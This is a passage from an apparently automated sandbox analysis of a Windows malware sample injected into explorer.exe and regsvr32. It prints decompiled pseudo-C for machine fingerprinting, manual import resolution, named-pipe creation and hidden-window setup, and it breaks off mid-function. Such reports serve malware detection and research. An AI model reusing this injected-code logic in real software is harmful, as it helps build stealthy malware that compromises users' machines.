        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: BuffCharUpper_vsnwprintflstrcatlstrcpynmemset
        • String ID:
        • API String ID: 1024327890-0
        • Opcode ID: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
        • Instruction ID: 2790561c89e92655b6e37f14f7a47cad77b00b55e4e119700a331dcc1739aec8
        • Opcode Fuzzy Hash: dfc5864c2b90876376009b67c939ce655e3198ce6944b79d75ab05716b14c094
        • Instruction Fuzzy Hash: 302156B2901218BFE714ABA4DC8AFEE77BCDF54310F10856AF505D6182EE75AF048B64
        Uniqueness

        Uniqueness Score: -1.00%

        Executed Functions

        Control-flow Graph

        APIs
        • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
        • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
        • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
        • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
        • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
        Memory Dump Source
        • Source File: 00000010.00000002.631423514.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_10077000_regsvr32.jbxd
        Similarity
        • API ID: Virtual$Protect$Alloc$Free
        • String ID:
        • API String ID: 2574235972-0
        • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
        • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        APIs
        • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
        • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
        Memory Dump Source
        • Source File: 00000010.00000002.631250512.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: DirectoryProtectSystemVirtual
        • String ID:
        • API String ID: 648172718-0
        • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
        • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Control-flow Graph

        APIs
        • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
        • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
        Strings
        Memory Dump Source
        • Source File: 00000010.00000002.631250512.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_16_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: ChangeDirectoryFindFirstNotificationWindows
        • String ID: 1
        • API String ID: 3662519435-2212294583
        • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
        • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
        Uniqueness

        Uniqueness Score: -1.00%

        Executed Functions

        C-Code - Quality: 100%
        			E00085A61(void* __eflags) {
        				intOrPtr _t2;
        				void* _t6;
        				void* _t7;
        
        				_t2 =  *0x9e684; // 0x133f8f0
        				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
        				E00085631(_t6, _t7); // executed
        				return 0;
        			}

        APIs
        • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: ExceptionHandlerVectored
        • String ID:
        • API String ID: 3310709589-0
        • Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
        • Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
        • Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
        • Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 80%
        			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
        				char _v516;
        				void _v1044;
        				char _v1076;
        				signed int _v1080;
        				signed int _v1096;
        				WCHAR* _v1100;
        				intOrPtr _v1104;
        				signed int _v1108;
        				CHAR* _v1112;
        				char _v1116;
        				void* __esi;
        				intOrPtr _t66;
        				CHAR* _t73;
        				signed int _t75;
        				intOrPtr _t76;
        				signed int _t80;
        				signed int _t81;
        				WCHAR* _t87;
        				void* _t89;
        				signed int _t90;
        				signed int _t91;
        				signed int _t93;
        				signed int _t94;
        				WCHAR* _t96;
        				CHAR* _t106;
        				void* _t108;
        				intOrPtr _t109;
        				signed char _t116;
        				WCHAR* _t118;
        				void* _t122;
        				signed int _t123;
        				intOrPtr _t125;
        				void* _t128;
        				void* _t129;
        				WCHAR* _t130;
        				void* _t134;
        				void* _t141;
        				void* _t143;
        				WCHAR* _t145;
        				signed int _t153;
        				void* _t154;
        				void* _t178;
        				signed int _t180;
        				void* _t181;
        				void* _t183;
        				void* _t187;
        				signed int _t188;
        				WCHAR* _t190;
        				signed int _t191;
        				signed int _t192;
        				intOrPtr* _t194;
        				signed int _t196;
        				void* _t199;
        				void* _t200;
        				void* _t201;
        				void* _t202;
        				intOrPtr* _t203;
        				void* _t208;
        
        				_t208 = __fp0;
        				_push(_t191);
        				_t128 = __edx;
        				_t187 = __ecx;
        				_t192 = _t191 | 0xffffffff;
        				memset( &_v1044, 0, 0x20c);
        				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
        				_v1108 = 1;
        				if(_t187 != 0) {
        					_t123 =  *0x9e688; // 0xb0000
        					_t125 =  *0x9e68c; // 0x133fab8
        					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
        				}
        				if(E0008BB8D(_t187) != 0) {
        					L4:
        					_t134 = _t128; // executed
        					_t66 = E0008B7A8(_t134,  &_v516); // executed
        					_push(_t134);
        					_v1104 = _t66;
        					E0008B67D(_t66,  &_v1076, _t206, _t208);
        					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
        					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
        					E0008B88A(_t141,  &_v1100, _t208);
        					_t175 =  &_v1076;
        					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
        					_v1112 = _t73;
        					_t143 = _t141;
        					if(_t73 != 0) {
        						_push(0);
        						_push(_t129);
        						_push("\\");
        						_t130 = E000892E5(_t73);
        						_t200 = _t199 + 0x10;
        						_t75 =  *0x9e688; // 0xb0000
        						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
        						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
        							L12:
        							__eflags = _v1108;
        							if(__eflags != 0) {
        								_t76 = E000891E3(_v1112);
        								_t145 = _t130;
        								 *0x9e740 = _t76;
        								 *0x9e738 = E000891E3(_t145);
        								L17:
        								_push(_t145);
        								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
        								_t188 = _t80;
        								_t201 = _t200 + 0x10;
        								__eflags = _t188;
        								if(_t188 == 0) {
        									goto L41;
        								}
        								_push(0x9b9ca);
        								E00089F48(0xe); // executed
        								E00089F6C(_t188, _t208, _t130); // executed
        								_t194 = _a4;
        								_v1096 = _v1096 & 0x00000000;
        								_push(2);
        								_v1100 =  *_t194;
        								_push(8);
        								_push( &_v1100);
        								_t178 = 0xb; // executed
        								E0008A0AB(_t188, _t178, _t208); // executed
        								_t179 =  *(_t194 + 0x10);
        								_t202 = _t201 + 0xc;
        								__eflags =  *(_t194 + 0x10);
        								if( *(_t194 + 0x10) != 0) {
        									E0008A3ED(_t188, _t179, _t208);
        								}
        								_t180 =  *(_t194 + 0xc);
        								__eflags = _t180;
        								if(_t180 != 0) {
        									E0008A3ED(_t188, _t180, _t208); // executed
        								}
        								_t87 = E0008980C(0);
        								_push(2);
        								_v1100 = _t87;
        								_t153 = _t188;
        								_push(8);
        								_v1096 = _t180;
        								_push( &_v1100);
        								_t181 = 2; // executed
        								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
        								_t203 = _t202 + 0xc;
        								__eflags = _v1108;
        								if(_v1108 == 0) {
        									_t153 =  *0x9e688; // 0xb0000
        									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
        									if(__eflags != 0) {
        										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
        										_t203 = _t203 + 0xc;
        										goto L26;
        									}
        									_t153 = _t153 + 0x228;
        									goto L25;
        								} else {
        									_t91 =  *0x9e688; // 0xb0000
        									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
        									if(__eflags != 0) {
        										L32:
        										__eflags =  *(_t91 + 0x1898) & 0x00000082;
        										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
        											_t183 = 0x64;
        											E0008E23E(_t183);
        										}
        										E000852C0( &_v1076, _t208);
        										_t190 = _a8;
        										_t154 = _t153;
        										__eflags = _t190;
        										if(_t190 != 0) {
        											_t94 =  *0x9e688; // 0xb0000
        											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
        											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
        												lstrcpyW(_t190, _t130);
        											} else {
        												_t96 = E0008109A(_t154, 0x228);
        												_v1100 = _t96;
        												lstrcpyW(_t190, _t96);
        												E000885D5( &_v1100);
        												 *_t203 = "\"";
        												lstrcatW(_t190, ??);
        												lstrcatW(_t190, _t130);
        												lstrcatW(_t190, "\"");
        											}
        										}
        										_t93 = _a12;
        										__eflags = _t93;
        										if(_t93 != 0) {
        											 *_t93 = _v1104;
        										}
        										_t192 = 0;
        										__eflags = 0;
        										goto L41;
        									}
        									_t51 = _t91 + 0x228; // 0xb0228
        									_t153 = _t51;
        									L25:
        									_t90 = E0008553F(_t153, _t130, __eflags);
        									L26:
        									__eflags = _t90;
        									if(_t90 >= 0) {
        										_t91 =  *0x9e688; // 0xb0000
        										goto L32;
        									}
        									_push(0xfffffffd);
        									L6:
        									_pop(_t192);
        									goto L41;
        								}
        							}
        							_t106 = E0008C292(_v1104, __eflags);
        							_v1112 = _t106;
        							_t108 = CreateNamedPipeA(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
        							__eflags = _t108 - _t192;
        							if(_t108 != _t192) {
        								_t109 =  *0x9e684; // 0x133f8f0
        								 *((intOrPtr*)(_t109 + 0x30))();
        								E0008861A( &_v1116, _t192);
        								_t145 = _t108;
        								goto L17;
        							}
        							E0008861A( &_v1112, _t192);
        							_t81 = 1;
        							goto L42;
        						}
        						_t116 =  *(_t75 + 0x1898);
        						__eflags = _t116 & 0x00000004;
        						if((_t116 & 0x00000004) == 0) {
        							__eflags = _t116;
        							if(_t116 != 0) {
        								goto L12;
        							}
        							L11:
        							E0008E286(_v1112, _t175); // executed
        							goto L12;
        						}
        						_v1080 = _v1080 & 0x00000000;
        						_t118 = E000895E1(_t143, 0x879);
        						_v1100 = _t118;
        						_t175 = _t118;
        						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
        						E000885D5( &_v1100);
        						_t200 = _t200 + 0x14;
        						goto L11;
        					}
        					_push(0xfffffffe);
        					goto L6;
        				} else {
        					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
        					_t206 = _t122;
        					if(_t122 == 0) {
        						L41:
        						_t81 = _t192;
        						L42:
        						return _t81;
        					}
        					goto L4;
        				}
        			}

        APIs
        • memset.MSVCRT ref: 00084A2D
        • CreateNamedPipeA.KERNEL32(00000000,00080003,00000006,000000FF,00000400,00000400,00000000,00000000), ref: 00084B8F
        • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
        • lstrcatW.KERNEL32 ref: 00084D3D
        • lstrcatW.KERNEL32 ref: 00084D41
        • lstrcatW.KERNEL32 ref: 00084D49
        • lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: lstrcat$lstrcpy$CreateNamedPipememset
        • String ID:
        • API String ID: 2307407751-0
        • Opcode ID: 7b912f2f440b3ae73bb546fbd17fc2a48739519a53412bd301377ca53efd02bb
        • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
        • Opcode Fuzzy Hash: 7b912f2f440b3ae73bb546fbd17fc2a48739519a53412bd301377ca53efd02bb
        • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 94%
        			E0008B7A8(WCHAR* __ecx, void* __edx) {
        				long _v8;
        				long _v12;
        				WCHAR* _v16;
        				short _v528;
        				short _v1040;
        				short _v1552;
        				WCHAR* _t27;
        				signed int _t29;
        				void* _t33;
        				long _t38;
        				WCHAR* _t43;
        				WCHAR* _t56;
        
        				_t44 = __ecx;
        				_v8 = _v8 & 0x00000000;
        				_t43 = __edx;
        				_t56 = __ecx;
        				memset(__edx, 0, 0x100);
        				_v12 = 0x100;
        				GetComputerNameW( &_v528,  &_v12);
        				lstrcpynW(_t43,  &_v528, 0x100);
        				_t27 = E000895E1(_t44, 0xa88);
        				_v16 = _t27;
        				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
        				asm("sbb eax, eax");
        				_v8 = _v8 &  ~_t29;
        				E000885D5( &_v16);
        				_t33 = E0008C392(_t43);
        				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
        				lstrcatW(_t43, _t56);
        				_t38 = E0008C392(_t43);
        				_v12 = _t38;
        				CharUpperBuffW(_t43, _t38);
        				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
        			}

        APIs
        • memset.MSVCRT ref: 0008B7C5
        • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
        • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
        • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
          • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
        • lstrcatW.KERNEL32 ref: 0008B85A
        • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
        • String ID:
        • API String ID: 3410906232-0
        • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
        • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
        • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
        • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 94%
        			E0008CF84(void* __ecx) {
        				intOrPtr _t11;
        				long _t12;
        				intOrPtr _t17;
        				intOrPtr _t18;
        				struct _OSVERSIONINFOA* _t29;
        
        				_push(__ecx);
        				_t29 =  *0x9e688; // 0xb0000
        				GetCurrentProcess();
        				_t11 = E0008BA05(); // executed
        				_t1 = _t29 + 0x1644; // 0xb1644
        				_t25 = _t1;
        				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
        				_t12 = GetModuleFileNameW(0, _t1, 0x105);
        				_t33 = _t12;
        				if(_t12 != 0) {
        					_t12 = E00088FBE(_t25, _t33);
        				}
        				_t3 = _t29 + 0x228; // 0xb0228
        				 *(_t29 + 0x1854) = _t12;
        				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
        				memset(_t29, 0, 0x9c);
        				_t29->dwOSVersionInfoSize = 0x9c;
        				GetVersionExA(_t29);
        				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
        				_t17 = E0008E3B6(_t3);
        				_t7 = _t29 + 0x220; // 0xb0220
        				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
        				_t18 = E0008E3F1(_t7); // executed
        				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
        				return _t18;
        			}

        APIs
        • GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
        • GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
        • memset.MSVCRT ref: 0008CFE2
        • GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
        • GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$FileModuleNameVersionmemset
        • String ID:
        • API String ID: 3581039275-0
        • Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
        • Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
        • Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
        • Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 50%
        			E0009249B(signed int __eax, intOrPtr _a4) {
        				intOrPtr* _v8;
        				signed int* _v12;
        				signed int _v16;
        				signed int _v20;
        				signed int _v24;
        				signed int _v28;
        				intOrPtr _v32;
        				struct HINSTANCE__* _v36;
        				intOrPtr _v40;
        				signed int _v44;
        				struct HINSTANCE__* _v48;
        				intOrPtr _v52;
        				signed int _v56;
        				intOrPtr _v60;
        				signed int _v64;
        				signed int _t109;
        				signed int _t112;
        				signed int _t115;
        				struct HINSTANCE__* _t121;
        				void* _t163;
        
        				_v44 = _v44 & 0x00000000;
        				if(_a4 != 0) {
        					_v48 = GetModuleHandleA("kernel32.dll");
        					_v40 = E0008E099(_v48, "GetProcAddress");
        					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
        					_v32 = _v52;
        					_t109 = 8;
        					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
        						L24:
        						return 0;
        					}
        					_v56 = 0x80000000;
        					_t112 = 8;
        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
        						_v8 = _v8 + 0x14;
        					}
        					_t115 = 8;
        					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
        					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
        						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
        						_v36 = _t121;
        						if(_v36 != 0) {
        							if( *_v8 == 0) {
        								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
        							} else {
        								_v12 =  *_v8 + _a4;
        							}
        							_v28 = _v28 & 0x00000000;
        							while( *_v12 != 0) {
        								_v24 = _v24 & 0x00000000;
        								_v16 = _v16 & 0x00000000;
        								_v64 = _v64 & 0x00000000;
        								_v20 = _v20 & 0x00000000;
        								if(( *_v12 & _v56) == 0) {
        									_v60 =  *_v12 + _a4;
        									_v20 = _v60 + 2;
        									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
        									_v16 = _v40(_v36, _v20);
        								} else {
        									_v24 =  *_v12;
        									_v20 = _v24 & 0x0000ffff;
        									_v16 = _v40(_v36, _v20);
        								}
        								if(_v24 != _v16) {
        									_v44 = _v44 + 1;
        									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
        										 *_v12 = _v16;
        									} else {
        										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
        									}
        								}
        								_v12 =  &(_v12[1]);
        								_v28 = _v28 + 4;
        							}
        							_v8 = _v8 + 0x14;
        							continue;
        						}
        						_t163 = 0xfffffffd;
        						return _t163;
        					}
        					goto L24;
        				}
        				return __eax | 0xffffffff;
        			}

        APIs
        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000924B8
        • LoadLibraryA.KERNEL32(00000000), ref: 00092551
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID: GetProcAddress$kernel32.dll
        • API String ID: 4133054770-1584408056
        • Opcode ID: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
        • Instruction ID: 665fec345cac807b649f43962df39f6cef8ef0a689833b3db65f34db15b36259
        • Opcode Fuzzy Hash: 041d95cafc6175721b1c8c10d1c9ed392241cd401a4ae6d81a1473d512fa1229
        • Instruction Fuzzy Hash: F6617B75900209EFDF50CF98D885BADBBF1BF08315F258599E815AB3A1C774AA80EF50
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 96%
        			E00082EDA(void* __eflags) {
        				CHAR* _v12;
        				struct HINSTANCE__* _v32;
        				intOrPtr _v44;
        				intOrPtr _v48;
        				void _v52;
        				char _v80;
        				char _v144;
        				intOrPtr _t25;
        				intOrPtr _t32;
        				struct HWND__* _t34;
        				intOrPtr _t36;
        				intOrPtr _t39;
        				struct HWND__* _t44;
        				intOrPtr _t47;
        				intOrPtr _t50;
        				void* _t51;
        				intOrPtr _t53;
        				intOrPtr _t56;
        				intOrPtr _t59;
        				struct HINSTANCE__* _t64;
        
        				_t25 =  *0x9e684; // 0x133f8f0
        				_t64 =  *((intOrPtr*)(_t25 + 0x10))(0);
        				memset( &_v52, 0, 0x30);
        				_t59 =  *0x9e688; // 0xb0000
        				E0008902D(1,  &_v144, 0x1e, 0x32, _t59 + 0x648);
        				_v48 = 3;
        				_v52 = 0x30;
        				_v12 =  &_v144;
        				_v44 = E00082E77;
        				_push( &_v52);
        				_t32 =  *0x9e694; // 0x133fa48
        				_v32 = _t64;
        				if( *((intOrPtr*)(_t32 + 8))() == 0) {
        					L6:
        					_t34 =  *0x9e718; // 0x50056
        					if(_t34 != 0) {
        						_t39 =  *0x9e694; // 0x133fa48
        						 *((intOrPtr*)(_t39 + 0x28))(_t34);
        					}
        					L8:
        					_t36 =  *0x9e694; // 0x133fa48
        					 *((intOrPtr*)(_t36 + 0x2c))( &_v144, _t64);
        					return 0;
        				}
        				_t44 = CreateWindowExA(0,  &_v144,  &_v144, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, _t64, 0);
        				 *0x9e718 = _t44;
        				if(_t44 == 0) {
        					goto L8;
        				}
        				ShowWindow(_t44, 0);
        				_t47 =  *0x9e694; // 0x133fa48
        				 *((intOrPtr*)(_t47 + 0x18))( *0x9e718);
        				while(1) {
        					_t50 =  *0x9e694; // 0x133fa48
        					_t51 =  *((intOrPtr*)(_t50 + 0x1c))( &_v80, 0, 0, 0);
        					if(_t51 == 0) {
        						goto L6;
        					}
        					if(_t51 == 0xffffffff) {
        						goto L6;
        					}
        					_t53 =  *0x9e694; // 0x133fa48
        					 *((intOrPtr*)(_t53 + 0x20))( &_v80);
        					_t56 =  *0x9e694; // 0x133fa48
        					 *((intOrPtr*)(_t56 + 0x24))( &_v80);
        				}
        				goto L6;
        			}

        APIs
        • memset.MSVCRT ref: 00082EF9
        • CreateWindowExA.USER32(00000000,?,?,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 00082F77
        • ShowWindow.USER32(00000000,00000000), ref: 00082F8A
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.894829145.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_80000_explorer.jbxd
        Similarity
        • API ID: Window$CreateShowmemset
        • String ID: 0
        • API String ID: 3027179219-4108050209
        • Opcode ID: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
        • Instruction ID: 213deb34b0e2dc67e2747e7ce6682629aec82146620f961571f6702d7269f10e
        • Opcode Fuzzy Hash: 003fa740151e0862398a7cbc69c8fa257132a5db8a09b7656452763574cb2ca0
        • Instruction Fuzzy Hash: A93106B2500118AFF710EFA8DC89EAA7BBCFB18384F004066B649D72A2D634DD04CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Control-flow Graph

        C-Code - Quality: 70%
        			E00084D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
        				char _v516;
        				char _v556;
        				char _v564;
        				char _v568;
        				char _v572;
        				char _v576;
        				intOrPtr _v580;
        				char _v588;
        				signed int _v596;
        				intOrPtr _v602;
        				intOrPtr _v604;
        				char _v608;
        				CHAR* _v612;
        				CHAR* _v616;
        				signed int _v620;
        				signed int _v624;
        				signed int _v628;
        				signed int _v632;
        				char _v636;
        				intOrPtr _t119;
        				void* _t120;
        				signed int _t122;
        				intOrPtr _t123;
        				CHAR* _t124;
        				intOrPtr _t125;
        				CHAR* _t127;
        				WCHAR* _t130;
        				intOrPtr _t133;
        				intOrPtr _t137;
        				WCHAR* _t138;
        				intOrPtr _t142;
        				WCHAR* _t143;
        				CHAR* _t144;
        				intOrPtr _t145;
        				intOrPtr _t150;
        				intOrPtr _t153;
        				WCHAR* _t154;
        				signed int _t159;
        				WCHAR* _t160;
        				intOrPtr _t163;
        				intOrPtr _t165;
        				intOrPtr _t166;
        				intOrPtr _t170;
        				signed int _t173;
        				signed int _t178;
        				intOrPtr _t182;
        				WCHAR* _t184;
        				char _t186;
        				WCHAR* _t188;
        				intOrPtr _t200;
        				intOrPtr _t211;
        				signed int _t215;
        				char _t220;
        				WCHAR* _t231;
        				intOrPtr _t235;
        				intOrPtr _t238;
        				intOrPtr _t239;
        				intOrPtr _t246;
        				signed int _t248;
        				WCHAR* _t249;
        				CHAR* _t250;
        				intOrPtr _t262;
        				void* _t271;
        				intOrPtr _t272;
        				signed int _t277;
        				void* _t278;
        				intOrPtr _t280;
        				signed int _t282;
        				void* _t298;
        				void* _t299;
        				intOrPtr _t305;
        				CHAR* _t326;
        				void* _t328;
        				WCHAR* _t329;
        				intOrPtr _t331;
        				WCHAR* _t333;
        				signed int _t335;
        				intOrPtr* _t337;
        				void* _t338;
        				void* _t339;
        				void* _t353;
        
        				_t353 = __fp0;
        				_t337 = (_t335 & 0xfffffff8) - 0x26c;
        				_t119 =  *0x9e688; // 0xb0000
        				_v620 = _v620 & 0x00000000;
        				_t328 = __ecx;
        				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
        					L7:
        					_t120 = E0008B7A8(0x9b9c8,  &_v516); // executed
        					_t14 = _t120 + 1; // 0x1
        					E0008A86D( &_v556, _t14, _t351);
        					_t298 = 0x64;
        					_t122 = E0008A471( &_v556, _t298);
        					 *0x9e748 = _t122;
        					if(_t122 != 0) {
        						_push(0x4e5);
